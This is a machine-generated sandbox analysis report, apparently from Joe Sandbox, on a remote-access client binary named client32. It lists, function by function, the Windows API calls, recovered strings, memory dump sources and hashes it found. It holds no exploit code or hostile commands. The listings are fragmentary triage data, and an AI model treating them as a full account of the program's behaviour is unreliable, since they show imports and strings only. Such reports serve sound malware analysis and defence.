                                                                                                • Opcode ID: 7ea4eae048862b99ba0e0310b89b2f5b793246d426b8f3d833c217033de6c8c5
                                                                                                • Instruction ID: 30ca919537b135777b6ac7a572dd94c0dd8b9ddd78e0c733ccca8c8450351950
                                                                                                • Opcode Fuzzy Hash: 7ea4eae048862b99ba0e0310b89b2f5b793246d426b8f3d833c217033de6c8c5
                                                                                                • Instruction Fuzzy Hash: B521607A600B019FD320CF29ED80E57B3E5EF94228B15D82DE99E87A01E731F9029B50
                                                                                                Function 69CE6CE7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable,00000000,000000C8,756F11C0,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6D0A
                                                                                                • GetProcAddress.KERNEL32(?,InternetReadFile,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6D72
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc
                                                                                                • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                • API String ID: 190572456-1434219782
                                                                                                • Opcode ID: e4ffb8695d782c0bec3f062dfe066bf8f51141b3342c0815e2556f6c25a64bfa
                                                                                                • Instruction ID: 0e31b2ac09b130463da8c4143c6dbe3503251a8c344e69781b0cb53a97858a96
                                                                                                • Opcode Fuzzy Hash: e4ffb8695d782c0bec3f062dfe066bf8f51141b3342c0815e2556f6c25a64bfa
                                                                                                • Instruction Fuzzy Hash: 71212A75D101A99FEB21DF54DA90BE8B3B4BB48345F5089B9EA89D7200E6709EC4CF50
                                                                                                Function 69CE60D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __wcstoui64.LIBCMT ref: 69CE6107
                                                                                                  • Part of subcall function 69D049AE: strtoxl.LIBCMT ref: 69D049D0
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,00000000,?,?,?,?,?,?,?,?,?,?,?,-000397EB), ref: 69CE6129
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,?,?,?,?,?,-000397EB,?,?,69CF3361), ref: 69CE6168
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave__wcstoui64strtoxl
                                                                                                • String ID: CONNECTION_ID
                                                                                                • API String ID: 2450600163-332495620
                                                                                                • Opcode ID: 632f153b490887ca242e43b8e403024c962ed443d75c854ffc6a80f614eeb41a
                                                                                                • Instruction ID: 4143078d7be17fa33755319abb0501ae7db428503cbe2710e3f7cda39ecaa57d
                                                                                                • Opcode Fuzzy Hash: 632f153b490887ca242e43b8e403024c962ed443d75c854ffc6a80f614eeb41a
                                                                                                • Instruction Fuzzy Hash: 4E11DC7A914A802BFF128B54BF4174F3624AF02388F05A035EB4743743F7B5AA4582A3
                                                                                                Function 69CE6BD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 69CE6C0F
                                                                                                • SetLastError.KERNEL32(00000078), ref: 69CE6C2E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: *$InternetQueryOptionA
                                                                                                • API String ID: 199729137-4161725205
                                                                                                • Opcode ID: 04d1dcf70ac8b533b701b7184af08221245ae24192be3ae6f31437dffa156ed7
                                                                                                • Instruction ID: 575edadc67177cac8f735e20d0ecf5d9ce19d5494c5249d343ced67233f71c2d
                                                                                                • Opcode Fuzzy Hash: 04d1dcf70ac8b533b701b7184af08221245ae24192be3ae6f31437dffa156ed7
                                                                                                • Instruction Fuzzy Hash: 17219F71900648DFDF10DF68D950B9DBBF0FF49310F10816AEA16AB280E775AA41CF91
                                                                                                Function 1105D500 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
                                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,986DAFD2), ref: 1105D59E
                                                                                                • SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,986DAFD2), ref: 1105D5A8
                                                                                                Strings
                                                                                                • Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterEventLeave
                                                                                                • String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
                                                                                                • API String ID: 3094578987-11999416
                                                                                                • Opcode ID: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                                                • Instruction ID: cd8e2c595cb3ca955c0a05eca4a83294a9fb2b4bfc4f95d4b2967c0930ade923
                                                                                                • Opcode Fuzzy Hash: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                                                • Instruction Fuzzy Hash: 6D2149B4500B65AFD364CF6AC490967FBF4FF88718700891EE5AA82B41E375F850CBA0
                                                                                                Function 11153570 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memmove.LIBCMT ref: 111535AC
                                                                                                • _memmove.LIBCMT ref: 111535E6
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                                                • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                                                • API String ID: 6605023-1396654219
                                                                                                • Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                                • Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
                                                                                                • Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                                • Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0
                                                                                                Function 69CE8B50 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memsetwsprintf
                                                                                                • String ID: %s_%d$Gateway_Name
                                                                                                • API String ID: 1984265443-207007254
                                                                                                • Opcode ID: a2cd85628cd3cb6bef5c292b48f5c4375e722184f460a1e4a4f61bf6bb8ce40e
                                                                                                • Instruction ID: 85c27c27634c148cedb9946aaec8eb9b195fccdc36bcd689bcf38f68b83f4113
                                                                                                • Opcode Fuzzy Hash: a2cd85628cd3cb6bef5c292b48f5c4375e722184f460a1e4a4f61bf6bb8ce40e
                                                                                                • Instruction Fuzzy Hash: D60147B8900208AFEB00DB68DC51FBE7378EF46308F408064FE0687280E630AE04C7A5
                                                                                                Function 110395A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(00000000,00000001), ref: 110395E6
                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 110395EE
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                • API String ID: 1136984157-1986719024
                                                                                                • Opcode ID: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                                • Instruction ID: 55b3f6273447a840922a2276b3415970a39c2bc3f54fc53508d86eb1e8118ba0
                                                                                                • Opcode Fuzzy Hash: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                                • Instruction Fuzzy Hash: C3F0C876640219BFD710CE55DCC6F9BB39CEB88754F108425F61597280D6B1E84087A4
                                                                                                Function 69CEC320 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                • _free.LIBCMT ref: 69CEC36A
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                • String ID: FLG=%d$ID=%d$UID=%s
                                                                                                • API String ID: 3180605519-3107437138
                                                                                                • Opcode ID: 6b67d65332af269091184d3ae68a054ce1de86bab88245185f7a9a7518ff12c2
                                                                                                • Instruction ID: 25907ebe326500f4a8a94afb19104730371ceaabde1177a476da86027b8fa0bf
                                                                                                • Opcode Fuzzy Hash: 6b67d65332af269091184d3ae68a054ce1de86bab88245185f7a9a7518ff12c2
                                                                                                • Instruction Fuzzy Hash: B1F062BA5002047BEB029B26EC84FABB75CEF06128F40D111FD1997A45E735E525C7F4
                                                                                                Function 11015400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                                • API String ID: 819365019-2727927828
                                                                                                • Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                                • Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
                                                                                                • Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                                • Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1
                                                                                                Function 1103D1F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,756F110C,1100BF7B), ref: 11110928
                                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                                • _free.LIBCMT ref: 1103D221
                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970
                                                                                                • SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
                                                                                                • MessageBeep.USER32(00000000), ref: 1103D25E
                                                                                                Strings
                                                                                                • Show has overrun too much, aborting, xrefs: 1103D1F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
                                                                                                • String ID: Show has overrun too much, aborting
                                                                                                • API String ID: 304545663-4092325870
                                                                                                • Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                                • Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
                                                                                                • Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                                • Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2
                                                                                                Function 1101D3C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,?), ref: 1101D3EB
                                                                                                • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                • API String ID: 1136984157-1986719024
                                                                                                • Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                                • Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
                                                                                                • Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
